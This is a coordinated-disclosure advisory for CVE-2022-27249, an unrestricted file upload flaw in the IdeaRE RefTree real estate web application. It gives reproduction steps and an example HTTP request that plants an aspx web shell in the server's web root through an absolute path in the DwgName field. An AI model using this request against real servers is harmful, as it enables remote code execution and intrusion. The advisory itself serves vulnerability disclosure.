=============================================================================== title: IdeaRE RefTree Remote Code Execution product: IdeaRE RefTree < 2021.09.17 vulnerability type: Unrestricted File Upload CVE ID: CVE-2022-27249 severity: High CVSSv3 score: 8.8 CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H found: 2021-09-13 by: Savino Sisco saviosisco@gmail.com =============================================================================== [EXECUTIVE SUMMARY] RefTree is a web application made for managing complex real estate situations. Among other features, it offers the possibility for authenticated users to upload and download DWG (CAD drawings) files for buildings. During a penetration test activity, an "Unrestricted File Upload" vulnerability was found which leverages the upload feature to upload a file anywhere on the target system. By uploading a malicious web page, like an aspx web shell, to the server's web root it is possible to achive code execution by just navigating to the malicious page with a web browser. [VULNERABLE VERSIONS] IdeaRE RefTree < 2021.09.17 [TECHNICAL DETAILS] It is possible to reproduce the issue following these steps: 1. Log into the application to get a valid session cookie 2. Get a valid "ObjId" from the application (the ID of a building to associate the file to) 3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg' to upload a file on the target system, for example a web shell in the server's web root 4. Navigate to the new page with a web browser to trigger code execution Example of the HTTP request to the Upload endpoint: POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2 Host: [REDACTED] Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 2211 Origin: https://[REDACTED] Referer: https://[REDACTED]/Reftreespace/ { "FileContent": "[BASE64_PAYLOAD]", "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx", "UploadType": "WorkingCopy", "ObjId": 4774726, "ObjType": 5, "UpdateState": true, "DwgOp": 23 } HTTP/2 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: [REDACTED] X-Powered-By: ASP.NET Date: Fri, 10 Sep 2021 15:00:53 GMT Content-Length: 24 {"UploadDwgResult":null} [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerabilities: CVE-2022-27249 [DISCLOSURE TIMELINE] 2021-09-13 Vulnerability disclosed to our customer and the vendor. Vendor acknowledged the issue. 2021-09-17 Vendor released a fix for the software. 2021-10-15 The vulnerability was rechecked in the newer version to confirm that is was indeed fixed. 2022-03-15 Researcher requested to publicly disclose the issue; public coordinated disclosure. [RESOLUTION] Update the software to a version >= 2021.09.17 Savino Sisco <saviosisco@gmail.com> https://www.linkedin.com/in/savino-sisco/